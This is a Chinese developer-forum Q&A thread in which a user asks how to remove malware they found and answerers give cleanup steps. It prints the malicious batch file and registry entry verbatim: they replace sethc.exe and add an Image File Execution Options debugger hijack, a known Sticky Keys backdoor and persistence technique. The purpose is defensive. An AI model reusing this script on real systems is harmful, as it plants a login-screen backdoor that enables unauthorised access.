求讲解！！！

悬赏园豆：10 [已解决问题] 解决于 2010-09-06 09:21

FH.bat

@echo off
attrib -s -a -h -r %systemroot%\system32\sethc.exe
attrib -s -a -h -r %systemroot%\system32\dllcache\sethc.exe
copy /y sethc.exe %systemroot%\system32\dllcache\sethc.exe
copy /y sethc.exe %systemroot%\system32\sethc.exe
regedit /s set.reg
regedit /s set.reg
exit

set.reg文件代码

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\WINDOWS\\system32\\set.exe"

然后windows启动向里面有自动启动FH.bat这个批处理文件。

我知道这是恶意的程序。但是怎么才能彻底的清除呢。就简单的删除启动项和源文件吗？

好像系统文件被替换了，怎么才能还原！

附上恶意软件的目录截图。

恶意软件目录截图

电脑和网络电脑安全

童同 | 菜鸟二级 | 园豆：258
提问于：2010-09-03 09:46

< >

最佳答案

没有具体样本，无法明确信息。

建议移除方法:

1. 杀软扫描:

C:\WINDOWS\system32\sethc.exe

C:\WINDOWS\system32\set.exe

并删除添加的注册表项(这个不会造成什么影响);

2. 删除 set.exe(建议备份);

删除注册表项，利用相同系统的 sethc.exe 覆盖本机的两个文件;

收获园豆：8

jamiezz | 菜鸟二级 |园豆：238 | 2010-09-03 11:01

其他回答(1)

关键是注册表那项，删除不让启动，批处理就用来隐藏启动它的。

删除这些文件和启动项，用360.

收获园豆：2

Astar | 园豆：40805 (高人七级) | 2010-09-03 14:30

清除回答草稿

您需要登录以后才能回答，未注册用户请先注册。

欢迎，请先 登录 或者 注册 。

求讲解！！！

欢迎，请先登录或者注册。